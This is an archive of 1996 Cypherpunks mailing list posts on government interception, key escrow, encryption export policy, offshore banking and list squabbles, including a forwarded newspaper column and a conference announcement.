My guess is it's mostly (1), though (2) and (3) might be enough to make it
uninteresting even if (1) wasn't true. But I don't know poo about how or
why EFF decides which issues to work on. Are you even a member? 

--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 8 Oct 1996 16:24:04 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: NSA/GCSB spying shown on NZ television
In-Reply-To: <84469141517140@cs26.cs.auckland.ac.nz>
Message-ID: <3259C69F.2487@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


pgut001@cs.auckland.ac.nz wrote:
> 20/20 today had a segment on the operation of the GCSB (Government
> Communications Security Bureau), the trading name of the NSA in New
> Zealand. This was motivated by the recent publication of Nicky Hagers
> book "Secret Power" which goes into great detail about the operation
> of the GCSB (it has floor plans of the monitoring stations, details of
> operations, staff, names and contact numbers, etc etc - it's a very
> well researched book covering the day-to-day running of an
> intelligence agency).

[some text deleted]

> AFAIK there's never been any direct, documented proof of what these
> bases are intercepting - the dishes are pointed in the right direction
> for intercepting Intelsat transmissions, but the various agencies have
> been able to deny the nature of the interception.  The footage of
> operations manuals on a desk would seem to prove beyond a doubt that
> the agencies are engaged in large-scale interception and monitoring of
> civilian communications.

[more text deleted]

A good primer for U.S. citizens on that area of the world can be found 
in a document called "The Opal File - the Round Table financial takeover 
of Australia and New Zealand".  Time period covered is May 1967 to Feb. 
1987.  Names mentioned include:

Hunt, Nelson B.
Muldoon, ? (N.Z. finance minister)
Onassis, Aristotle
Colby, William
Parsky, Gerald
Hand, Michael
Maheu, Robert
Rockefeller, David
Sindona, Michele
Wriston, Walter
McCloy, John J.
Brierly, Ron
Seldon, Bob
Nugan, Frank
Jones, Bob
Fletcher, J.C.

There are many other names, it's a great document, and the size is 
relatively small, about 59 kb.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 8 Oct 1996 13:11:49 +0800
To: attila@primenet.com
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <199610071855.MAA05992@infowest.com>
Message-ID: <199610080113.UAA00692@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


> 
> In <19961006045736515.AAA164@GIGANTE>, on 10/05/96 
>    at 09:58 PM, Adamsc@io-online.com (Adamsc) said:
> -.On Sat, 5 Oct 1996 15:55:42 -0700 (PDT), John C. Randolph wrote:
> -.>What's really sad is the way that every cult member tries to convince
> -.>himself that *his* franchise has more to offer than Lifespring,
> -.Food for thought:  suppose he didn't - why would any rational individual
> -.follow a religion he thought was wrong?
> 
>         that statement is profound in more ways that in religion!  why
>     would any rational individual espouse ANY cause he thought was
>     wrong!

     For the money.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 8 Oct 1996 11:20:02 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
In-Reply-To: <199610061907.MAA23619@mail.pacifier.com>
Message-ID: <Pine.LNX.3.94.961007201923.1320B-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 6 Oct 1996, jim bell wrote:

[...]
> 
> Sure, such a capacity is small compared with the total Internet traffic, but 
> I assume that most traffic could be excluded from recording if its source 
> was known, etc.  They'd exclude anything from "probably-okay" web pages, they'd 
> trim space-hogging graphics, etc.  "Just the facts, ma'am."     Call the 
> whole thing "retroactive-selective-drift-net-fishing," if you will.
> 

Yes, but because of the fact that they can't store everything, and will
have to be selective, many holes can be found.  This is why we have stego.

>
> Once this data is stored away the government would determine (perhaps years 
> after the fact?) which data they want to decrypt, possibly based on crimes 
> committed long after the data was recorded.  This information might reveal 
> contacts, etc.   Obviously they have no prayer of doing real-time analysis.  
> Even so, it makes it far more practical to do the equivalent of drift-net 
> fishing if they can exclude 99.9999%+ of the traffic from their decryption 
> attempts.  56-bit encryption doesn't look so ominous to them in this case.
>

But most of the time it would take them long enough to decrypt that the
statute of limitations for the crime has worn out.  So unless they can do
it real-time, or at least within a _few_ years, it becomes useless except
for defimation of the suspect's character.
 
> Jim Bell 
> jimbell@pacifier.com 

 --Deviant
You scratch my tape, and I'll scratch yours.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 8 Oct 1996 15:06:06 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Voice Stress Analysis of Debates?   [NOISE]
Message-ID: <199610080403.VAA08661@dfw-ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


As far as the technical issue, can you use digital signal processing
to insert/delete the features that the VSE is looking for?
Sure, if you know what the VSE product is looking for.
(And you can crank up the bass while you're at it.)
Doesn't matter if you call it microtremors, it's a characteristic
well-defined enough that an $89.95 retail hardware device can detect,
so it's a characteristic you've got a not-terribly-complex model for.
If all the popular VSEs use the same algorithm, or if you know what
brand the TV Networks were convinced to use, you're fine.
(If you don't know, that makes it tougher, but you can experiment....)
Or you can distribute a cheap software-based VSE program, with hooks that
let you feed it "Truth" or "Lying" overrides :-)

At 11:28 AM 10/7/96 -0800, jim bell <jimbell@pacifier.com> wrote:
>I think it's particularly revealing that the TV networks don't try to use 
>it.  They're supposed to be looking for an edge, something to make the news 
>seem more interesting.  The political establishment would see the 
>publicizing of  this as going beyond an unwritten limitation on the media.

I've never seen the TV networks use handwriting analysis to spice up
their news reporting either, and the only "news" shows I've only seen 
mention people's astrological signs were the Entertainment-Tonight types.
(I'd rate VSE as slightly more scientific than graphology, and both of them
somewhat above palm-reading and astrology, and a bit below polygraphs.*)
They get more market asking what kind of underwear the candidates wear.

Besides, what would they do with it - subtitles "He's Lying" or
"He Seems To _Believe_ This Nonsense?" or "He Doesn't Really Care What 
The Teleprompter's Telling Him To Say"?  You'd need to leave at least
one of them on during the whole Bipartisan Establishment Debate**,
and you don't need any piece of hokey machinery to 
If they actually _wanted_ to make the shows more interesting, the networks
could have reporters ask the candidates real questions.  But they
wouldn't get invited back next election....  And if they ask questions like
"How could you possibly expect us to believe _that_, Mr. President?"***,
they'd get thrown out immediately.

[*VSE and Graphology have some chance of a causal basis, though
polygraphs have the extra advantage that the people administering them
get to intimidate the victim while doing the test, which is more likely
to get results than running VSE on a speech somebody's practiced and
is reading off a teleprompter, even if interpretation of both weren't
pretty much subjective anyway.]

[**And they'd have to interlace the subtitles with the fnords.]

[***Did you ever notice how much George Bush _sneered_ when he was lying?
Clinton's polite enough to smile when he's talking.]


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 8 Oct 1996 14:41:43 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Can somebody unsubscribe cyberpromo from CP?
Message-ID: <199610080404.VAA08675@dfw-ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:43 PM 10/7/96 -0400, Simon Spero <ses@tipper.oit.unc.edu> wrote:
>> >I think somebody subscribed that Cyberpromo organization to the Cypherpunks
>> >list.  It needs to be unsubscribed...
>> 
>> "I have a solution."

>[Looks through pockets] - 7 Zlotys, 1.5 DM, and 1.20 GBP says October 
>21st, in the library, bludgeoning to death with 20lbs of junk mail

I tend to prefer 16-ton weights, myself....
                "Safe!"

>If I can get my key back,   it's Key Recovery
>If you can get my key back, it's Key Escrow

If I can get my key back, it's a Spare Copy I Stashed Somewhere.
If you can get my key back, it's Wimpy Encryption.
If you've already got my key, it's Key Escrow.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 8 Oct 1996 17:10:13 +0800
To: cypherpunks@toad.com
Subject: Global online intellectual property conf at American Univ
Message-ID: <Pine.GSO.3.95.961007210519.16037G-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Mon, 7 Oct 1996 21:05:09 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: Global online intellectual property conf at American Univ

Folks in the DC area might want to stop by this free conference on
intellectual property next week at American University. I'll be giving
the closing remarks; Mike Nelson from the White House will be
presenting the opening statement.

-Declan

---------- Forwarded message ----------

All who are interested are invited to attend a conference . . .

The 1996 Conference of American University's
Global Intellectual Property Project

OWNERSHIP ON-LINE:
INTELLECTUAL PROPERTY IMPLICATIONS OF
THE GLOBAL INFORMATION INFRASTRUCTURE

October 16, 1996
1:00-6:00 pm
Husghes formal Lounge
American University
4400 Massachusetts Ave., NW
Washington, DC  20016-8071

Free and Open to the Public

Opening Session:
Michael R. Nelson
Special Assistant for Information Technology
White House Office of Science and Technology

Panel 1:
Where are we and how did we get here?
Panel 2:
Where are we going?

Closing Session:
Declan McCullagh, HotWired

Participants Include:
David Holtzman, IBM's inforMarket
Theodore Henke, Atlantic Mutual Insurance Companies
Adam Eisgrau, American Library Association
Elizabeth Blumenfeld, America On-Line
Chris Meyer, Meyer and Klipper (formerly of the Patent and
        Trademark Office)
Carsten Fink, World Bank
Edward Comor, American University
James Boyle, American University
Peter Jaszi, American University
Edward Malloy, Department of State
Manuel Gameros, Mexican Finance Ministry

Organizing Committee:

Erran Carmel, American University
Carole Ganz-Brown, American University and National Science Foundation
Renee Marlin-Bennett, American University

Conference Sponsors:

American University
Atlantic Mutual Companies

Visit our Website, under construction, but with updated information, at:
http://gurukul.ucc.american.edu/MOGIT/glipp96.htm

or call:  202-885-1843







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 8 Oct 1996 16:10:03 +0800
To: roger@coelacanth.com (Roger Williams)
Subject: Re: Clipper spin [was Re:Flood Warning]
In-Reply-To: <rogerohie1lc5.fsf@trout.coelacanth.com>
Message-ID: <199610080224.VAA00447@homeport.org>
MIME-Version: 1.0
Content-Type: text


Roger Williams wrote:

| >>>>> Peter Trei <trei@process.com> writes:
| 
|   > Back when IBM/Lotus came out with it's "International" version, I
|   > proposed the term 'espionage-enabled software'. I still like it.
| 
| But it doesn't have a catchy acronym like "Government Access to Keys".
| 
| "Espionage-Enabled Keys", maybe? ;-)

	"COINTERPRO Enabled.  For our counter-terrorism experts."

	That's COunter INternational TERrorism PROgram.  Any relation
to actual government programs, living or dead, is purely coincidental.

	Coming soon, CODINEPRO, for our drug czars (does anyone else
find the idea of an American Tzar soothing?  I know I do).

Adam

-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Tue, 8 Oct 1996 14:43:26 +0800
To: attila@primenet.com (attila)
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <199610071855.MAA05992@infowest.com>
Message-ID: <961007.215142.1A1.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP MESSAGE-----
Version: 2.6.2

owF9Uk1IVFEYVSyKkaGdmyKOYJSkk3+NP1TqjBphI6NmKhl1Z959827euff17n2O
L3KXCxE3gYsMskWLCFq0sTYSCAUptJIIokUFtqgWBS1aFN3nZFmLPt7i8X3nnu+c
c+9MyXzZzpKG0ZXU3rfXDy1PbTwrLX15pOxH5diTw6src+9idx4tPaze58uK1PDZ
C+1v1oa6nq6NjCztupqtWJXLQ90Vs7PPP67L6snmpdpCw/cvrdZC/0r/+IdvNy8u
zu2ZvvFYN82n2fTM2LXyz7feJ193LKRqjj34tNj7Ij51ZbI8s/q1cm79dE/msnWv
ZCMxnHi14+7Igbrb98tKM7t13m2IVVVVlZg6JcCZ0rFs4DrUc30xrmpAtGacdLge
y1NBzVDmUfCYpqotGolGTmB/rEdKC7b0oB3p5xzdBijfdaWicCgsZomDGrUoOAEK
0ucWiAjgEc2kIBxMWGyCWT7hRTZbci4LIPAoZzmDCUl+MaNAlNkuRa7dgIsftko7
RENpoqlRqsEUXE/a0heW2YG89Kg5HqgiznS2+CsRStti+q9CUOVK3/jq7BtFlvhF
h9vE/WYJNVaGAQ2H20hG+mbuUGHAdDuh0Ssso0kiR4wm2zPxhpAiecFhnEJIHY0o
P3OJZnWIDOeC5oy8CQpq26at2oG05EyzLCNCwdwSNQaJxXgQHsmblbFopLYW0Qj+
1IAMkIphkPEJ6gnC+Gb3HM4Xx54MOlQ20ITT8N6jka6+gSRSTJhXQj2kORXMldqk
zYgXQNro5BxnHCZyCkkpbF+Z3xoMSlsXiMm/y9hWJtRoJH0yjbSf4SyLXhrANjjz
5DxmLu440FiPlji6k0i0oiuB5jg6m3G0CahvRF0C8U7EE0gmUdeK+hYk4n+Z2qyQ
lEwYRyRjEtyM1fUz4/QfQz8B
=4wTe
-----END PGP MESSAGE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.net>
Date: Tue, 8 Oct 1996 15:49:10 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Put up or shut up! (fwd)
In-Reply-To: <Pine.BSD.3.92.961008001601.26311A-100000@miso.wwa.com>
Message-ID: <Pine.SUN.3.94.961007221621.27979B-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Oct 1996, Mr Unicorn replies to what snow wrote:
 
> > Mr. Unicorn wrote:
> > > I suggest that you just walk into a bank in Luxembourg, Liechtenstein,
> > > perhaps in Switzerland and compare the experience to doing the same in the
> > > United States.  It may be a bother to get to a real bank, but the
> > > difference in service, attitude, and skill can be substantial.
> > > You get what you pay for in sweat too.
> >
> >      Yeah, but the walk to the bank in Liechtenstein is a real bitch in
> > winter.
> 
> You get what you pay for.  I thought I said that?
> Many banks open accounts by mail.  I tend to recommend against this
> because I think it's important to face to face with your bankers.

Being that I totally agree that you get what you pay for in banking,
and have had the opportunity of using a small private bank for 
business some time ago.  What would be your list of best offshore
banks to do business with, Keeping in mind the ease of opening an
account but still getting top notch service?  Bank of Ireland???

Cheers!

William Knowles
erehwon@c2.net
  

--
William Knowles    <erehwon@c2.net>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--
Vote Harry Browne for President -- http://www.HarryBrowne96.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 8 Oct 1996 14:01:57 +0800
To: cypherpunks@toad.com
Subject: Re: Did Jesus masturbate ?
In-Reply-To: <3256F923.59A1@adv.es>
Message-ID: <BemgVD26w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"I~nigo Gonzalez" <nexus@adv.es> writes:
> About Utah, Mormons, Religion /etc... Is someone mailing
> ciphertext to the list in the form of Noise ????

Timmy May sent the initial mormon-bashing flame bait.

Dunno about Jesus, but Timmy probably masturbates a lot at the flame
wars he provokes with his flame bait and personal attacks.

> Please use _plaintext_ or just learn Crypto.

He ain't got the brains to learn any crypto, so he says it's not necessary.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Tue, 8 Oct 1996 17:11:26 +0800
To: mac-crypto@thumper.vmeng.com
Subject: yellow journalism and Encryption
Message-ID: <v03007807ae7f9faefb54@[204.179.128.206]>
MIME-Version: 1.0
Content-Type: text/plain


The following is an example of the asswipe media's attempt to write about
encryption.


http://www.sfgate.com/cgi-bin/examiner/article.cgi?year=1996&month=10&day=06&art
icle=BUSINESS2814.dtl

Encryption controversy pits life against liberty

TOM ABATE
EXAMINER COLUMNIST

The Clinton administration tried again last week to rally support for an
encryption policy that would give the FBI the means to tap any electronic
communication, without unduly infringing on civil liberties or impeding
software exports.

At stake in the policy battle are software exports worth millions, Fourth
Amendment rights Americans have enjoyed for centuries, and innocent lives
that the good guys say might be saved if they're able to keep snooping on
the bad
guys.

And the reason all of this has become a policy jumble is simple. Computers
have made it cheap and easy to create unbreakable secret codes to protect
phone calls, e-mail and data files against electronic bugging.

That's why this technology, called encryption, means profits in Silicon
Valley, more privacy for you and me, and a problem for federal
investigators. Because secret codes allow criminals to nullify the fed's
favorite tool - the wiretap.

"Wiretapping is the main issue," said Stewart Baker, former general counsel
of the National Security Agency, the CIA's code-breaking and eavesdroping
cousin.

"For the administration to abandon the position it started with three years
ago would be to say, "We are the administration that is going to give up
the wiretap as a law enforcement tool,"" he said.

That's why last week the administration tried a new variant in its
3-year-old campaign to require that code-making systems be built with a
"spare key" investigators could retrieve, under court order, to crack any
code.

When the administration first proposed this idea in 1993, it involved a
device called the "Clipper chip," which would have deposited spare keys
with government agencies. Almost no one outside the FBI liked that idea, so
last week the
administration floated a compromise: to let U.S. firms export strong
code-making products, provided they deposited the spare key with some third
party.

Exports are the odd piece in this policy puzzle. The U.S. government has no
authority to regulate secret codes within U.S. borders. But a law passed
after World War II put secret codes in the same category as munitions,
products that
cannot be exported without a license.

The government has used this export-licensing authority to indirectly
control code-making software here. Most high-tech firms are unwilling to
sell two sets of encryption products, one full- and the other
half-strength, so they have
sold weak encryption products everywhere.

In essence, the administration hopes to use export controls to change the
balance of power in a new war. This time the enemy isn't the Japanese or
the Germans, as during WWII, or even our Cold War adversaries, the
Russians. Instead, the administration fears drug smugglers, organized
criminals and terrorists will use code-making devices to evade electronic
evidence-gathering techniques, notably wiretapping.

"If two criminals are discussing a plot over the telephone and we have a
wiretap order, the encryption would negate the wiretap," said Michael
Vatis, a senior Department of Justice official.

The same would happen if investigators seized the computerized bookkeeping
records of a drug-smuggling ring only to find they were saved in an
unbreakable code. But as frustrating as it might be to seize a mound of
indecipherable evidence, it was the prospect of losing the wiretap that got
Vatis most aroused.

"For serious investigations involving terrorists or organized crime . . .
where you're worried about hundreds of people being killed . . . the whole
point is to keep the investigation secret or the whole thing blows up," he
said.

Having access to a spare set of code-breaking keys "is not a shift in the
balance of power," Vatis said. "It's preserving
the status quo."

Not so, argued Daniel Weitzner, an attorney with the civil libertarian
Center for Democracy and Technology inWashington, D.C. Forgetting
encryption for a moment, Weitzner said, a wiretap is unlike any other tool
in the
investigator's arsenal.

"To get documents sitting on my computer, the FBI has to come into my
office with a search warrant," Weitzner said. "I have to know about it."

Exactly the reverse is true for a wiretap. To be effective, the subject
must be ignorant of the tap. Weitzner said this
notion of a "secret search" went against a central principle of the Fourth
Amendment, which protects people from
unreasonable search and seizure.

"When wiretapping was allowed in 1968, Congress basically said they were
going to create an exception to this rule,"
Weitzner said.

But in the three years since the Clipper debate began, the FBI has enlarged
its interest beyond preserving phone taps
and has asked for spare keys to the codes used to protect Internet traffic
and stored computer files, Weitzner said.

"If the FBI is able to transfer its wiretap authority to the Internet, it
would give the bureau access to a new realm of
activities," Weitzner argued.

Using the spare keys to Internet transmissions could give the agency access
to medical records, charge card receipts or
other data stored or transmitted on the global network. Moreover, the
agency might be able to tap some of this
information in transit, without the knowledge of the person being
investigated, whereas today agents would have to
visit the doctor's office or bank, potentially alerting the target.

"If all things in the digital world are open to wiretap-type scrutiny, then
we have lost the protection against secret
searches," Weitzner said. "What is on the way to happening is that the
exception could swallow the rule."

The temptation to tap wires is as old as wired communication itself,
according to Clifford Fishman, law professor at
Catholic University's Columbus School of Law in Washington, D.C., and
author of a textbook on wiretapping.

During the Civil War, both sides tapped telegraph lines to spy on troop
movements. Wiretaps were common in the
early days of the telephone, and Supreme Court decisions during the 1920s
said this was no invasion of privacy
because the tap was on a public telephone pole and not inside a home.

In response, Congress made wiretaps illegal at the federal level as part of
the Communication Act of 1934. But
Fishman said state investigators kept right on using wiretaps, as did the
feds, who sometimes used unauthorized taps
on Mafia and political figures during the long reign of former FBI director
J. Edgar Hoover.

Congress legalized federal wiretaps in 1968 at a time when Richard Nixon
was campaigning against the liberal Earl
Warren Supreme Court.

"The mood in Congress was to defang the Republicans on law enforcement,"
Fishman said. "Lyndon Johnson, with
palpable reluctance, signed this bill to permit federal officials to obtain
a court order to do a wiretap or a bug and use
this information in court."

Fishman, a former New York City district attorney, considered wiretapping
essential to investigating the most
dangerous crimes and called the administration's latest spare-key proposal
a good compromise.

But civil libertarians fear that giving investigators the keys to unlock
any coded phone call or electronic document will
greatly expand the realm of secret searches and tempt them to abuse a power
that was denied them in the days when
ensuring privacy meant putting wax seals on envelopes.

Much of the coverage of the encryption controversy has centered on the
complaints of Silicon Valley firms that they are
losing hundreds of millions of dollars in exports to foreign competitors
who don't have to limit the strength of their
encryption products.

Though that may be the case, there's more at stake here than money or jobs.
Our wired society is about to decide how
easy it should be for investigators to figuratively climb up the telephone
pole to put alligator clips on our secrets,
whether innocent or criminal.

To give investigators the keys to every code might be too much temptation
and a threat to civil liberties. To deny
investigators the keys may handcuff them in the fight against increasingly
sophisticated and deadly forms of crime.

That is the nature of the choice on encryption policy, and that is why
there is no simple compromise.

Tom Abate's column appears every other Sunday. You can reach him this fool
mailto:tabate@examiner.com


Vinnie Moscaritolo
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A
-------------------------------------------------------

 "...and by the way, Mr.Speaker, the Second Amendment is not
    for killing little ducks and leaving Huey and Dewey and Louie
    without an aunt and uncle. It's for hunting politicians, like
    in Grozny, and in the colonies in 1776, or when they take your
    independence away."
   --- Rep. Robert (B-1 Bob) Dornan (R-CA) responding to Bill
       Clinton's "State of the Union" address, January 25, 1994






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 8 Oct 1996 14:29:15 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Put up or shut up!
In-Reply-To: <199610072023.NAA20429@dns1.noc.best.net>
Message-ID: <Pine.SUN.3.94.961007234826.25627B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Oct 1996, James A. Donald wrote:

> At 05:18 AM 10/7/96 -0400, Black Unicorn wrote:
> >  There is no
> > one good solution, and anyone who sells you a universal package is selling
> > you a bill of goods.
> 
> Surely there is at least one good solution to an exceedingly common 
> problem -- large assets in the US that are known to the authorities.

You're getting off topic.  You're talking about hiding assets, not
protecting them.  Different matter.

> 
> > Careful, professional, and highest quality service is required to properly
> > design any investment design.  Again, you get what you pay for.
> 
> Smoke.

Were I talking about hiding assets, I might agree with you here.  I am
not.  Again, different matter.

> The reason that no one publishes "How to" step by step instructions for 
> discretely expatriating your money is exactly the same reason as the reason
> that nobody publishes "How to" step by step instructions for buying dope.

Who said anything about discretely expatriating money?
If you want those step by step instructions I suggest the annual
congressional report "Recent Trends in Money Laundering."  Nice diagrams.
Nice how to.  Some step by step advice for what is baffling the
authorities at the moment.

> For example one ever popular method of expatriating money, (or repatriating
> it to preferred politicians), is by means of a friendly cattle futures 
> broker.
> 
> First find your friendly cattle futures broker.
> 
> Despite this, many people manage to buy dope and many people manage to 
> discretely expatriate their money.

Were I talking about expatriating money discretely I would consider these
all valid points.

> 
>  ---------------------------------------------------------------------
>               				|  
> We have the right to defend ourselves	|   http://www.jim.com/jamesd/
> and our property, because of the kind	|  
> of animals that we are. True law	|   James A. Donald
> derives from this right, not from the	|  
> arbitrary power of the state.		|   jamesd@echeque.com
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 8 Oct 1996 14:29:41 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Put up or shut up!
In-Reply-To: <199610072156.QAA00362@smoke.suba.com>
Message-ID: <Pine.SUN.3.94.961007235258.25627C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Oct 1996, snow wrote:

> Mr. Unicorn wrote:
> > I suggest that you just walk into a bank in Luxembourg, Liechtenstein,
> > perhaps in Switzerland and compare the experience to doing the same in the
> > United States.  It may be a bother to get to a real bank, but the
> > difference in service, attitude, and skill can be substantial.
> > You get what you pay for in sweat too.
> 
>      Yeah, but the walk to the bank in Liechtenstein is a real bitch in 
> winter. 

You get what you pay for.  I thought I said that?
Many banks open accounts by mail.  I tend to recommend against this
because I think it's important to face to face with your bankers.

> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 8 Oct 1996 14:42:38 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: EUB - Pay attention next time guys.
In-Reply-To: <199610080101.SAA05272@dns2.noc.best.net>
Message-ID: <Pine.SUN.3.94.961007235730.25627E-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Oct 1996, James A. Donald wrote:

> At 05:09 PM 10/7/96 -0400, Black Unicorn wrote:
> > EUB is probably in more trouble than they realize because they chose an
> > interesting solution to their bandwidth problem. 
> >
> > [...]
> >
> > Prediction: EUB will change its structure dramatically in the next 6
> > months if it still exists at all in that time. 
> 
> Prediction:  Nothing much will happen to European Union bank.

Disagree strongly.  The islands are very conscious of their image
particularly when it comes to organized crime and drugs.  EUB not exist in
its present form or anything like it.  The U.S. still has strings to pull
in that area.  Avoid the islands for these reasons.

> Possibily their US web site will be closed down, in which case 
> twenty guys will echo it, and they will have to pay more for bandwidth.

The U.S. is getting to clever at this to just shoot at the front end.
Gorelick and friends will see to that.
 
> > Lesson learned: Never
> > involve the United States directly. 
> 
> Lesson learned.  The United States is just a speed bump on the information
> highway.

A rather large speedbump.

> The critical error is not involving the United States directly, the 
> critical error is leaving assets or information in a place and form 
> where US thugs with guns can get at it.

The United States is full of thugs with guns, but they do tend to have
problems getting involved where there is not even the vaguest hint or
jurisdiction.  EUB solved that problem for the US quite effectively.

> I see no reason to believe the EUB has made this error.

I disagree, but time will tell.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 8 Oct 1996 14:40:31 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: What's the deal with EUB.com?
Message-ID: <Pine.SUN.3.94.961008002826.26588A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



There are two servers that EUB.com uses.

1> That provides information and blurbs and pretty pictures.  This is near
D.C.

2> That provides secure connections to the bank for account information
and transactions.  This is in the islands.

Again, this was adopted to get around expensive bandwidth uses by idle and
casual browsers.

I believe, though I am not sure, that I mentioned this when EUB first
"went net."

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Tue, 8 Oct 1996 00:41:34 +0800
To: cypherpunks@toad.com
Subject: NSA/GCSB spying shown on NZ television
Message-ID: <84469141517140@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


20/20 today had a segment on the operation of the GCSB (Government 
Communications Security Bureau), the trading name of the NSA in New Zealand.
This was motivated by the recent publication of Nicky Hagers book "Secret 
Power" which goes into great detail about the operation of the GCSB (it has 
floor plans of the monitoring stations, details of operations, staff, names 
and contact numbers, etc etc - it's a very well researched book covering the 
day-to-day running of an intelligence agency).
 
In the 20/20 segment, Nicky and a reporter managed to get through the security 
perimeter at the Waihopai base with a camera and ladder, climbed up to the 
windows, and shot footage of the interior of the base through 
improperly-closed curtains.  The main operations room had racks of equipment 
which is hard to identify (it's not a very good shot), along with tables 
containing PClone monitors and HP II's[1].  Unfortunately the resolution isn't 
good enough to show what's being displayed on the monitors.  Another shot of 
an office showed a desk with Intelsat operations manuals, providing, for the 
first time, direct proof of whose traffic is being monitored - not the 
Russians, not the Chinese, but NZ's pacific neighbours and trading partners.  
The intercepted traffic is then passed straight back to the NSA for analysis.
AFAIK there's never been any direct, documented proof of what these bases are 
intercepting - the dishes are pointed in the right direction for intercepting 
Intelsat transmissions, but the various agencies have been able to deny the 
nature of the interception.  The footage of operations manuals on a desk would 
seem to prove beyond a doubt that the agencies are engaged in large-scale 
interception and monitoring of civilian communications.
 
It was rather unfortunate that the program was shown at the same time as the 
political leaders debate on another channel (we have an election in four days 
time), because virtually noone will have watched 20/20.
 
Peter.

[1] Given that the windows looked like plain glass and that these things have 
a control zone that reaches halfway to Antarctica, I'd love to park outside 
the base with certain pieces of receiving equipment...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: spencerj@dg-rtp.dg.com (Jon Spencer)
Date: Tue, 8 Oct 1996 15:54:13 +0800
To: alexf@iss.net (Alex Filacchione)
Subject: Re: Dole web site cracked?
